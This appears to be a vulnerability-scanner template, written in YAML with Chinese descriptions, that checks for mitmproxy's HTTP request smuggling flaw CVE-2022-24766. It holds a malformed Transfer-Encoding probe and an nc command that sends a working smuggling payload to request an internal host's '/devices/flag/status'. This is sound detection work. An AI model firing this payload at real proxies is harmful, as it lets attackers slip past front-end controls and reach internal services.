name: "MitmProxy HTTP 请求走私 (CVE-2022-24766)"
description: "存在对 Transfer-Encoding 前缀解析缺陷（如 chunkedasd），可能导致前后端解析不一致，从而实现请求走私与内网探测/访问。"
severity: "critical"
references:
  - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24766"

requests:
  - steps:
      # 探测1：错误前缀 Transfer-Encoding，部分代理错误接受（chunkedasd）
      - method: "GET"
        path: "/"
        headers:
          Connection: "keep-alive"
          Transfer-Encoding: "chunkedasd"
          Content-Length: "2"
        body: "0a0a0a0a0a0a0a0a0a0a0a0a0a0a0a0a0a0a0a0a\r\n\r\n"
        matchers:
          - type: "status"
            status: [400]
          - type: "word"
            words: ["HTTP Body too large"]
            condition: 'and'

  - post:
      - command: "printf 'GET / HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: chunkedasd\r\nContent-Length: 3\r\n\r\n\r\n4F\r\nGET /devices/flag/status HTTP/1.1\r\nHost: internal.router\r\nConnection: close\r\n\r\n\r\n0\r\n\r\nGET / HTTP/1.1\r\nHost: localhost\r\n\r\n' | nc -v {host} {port}"
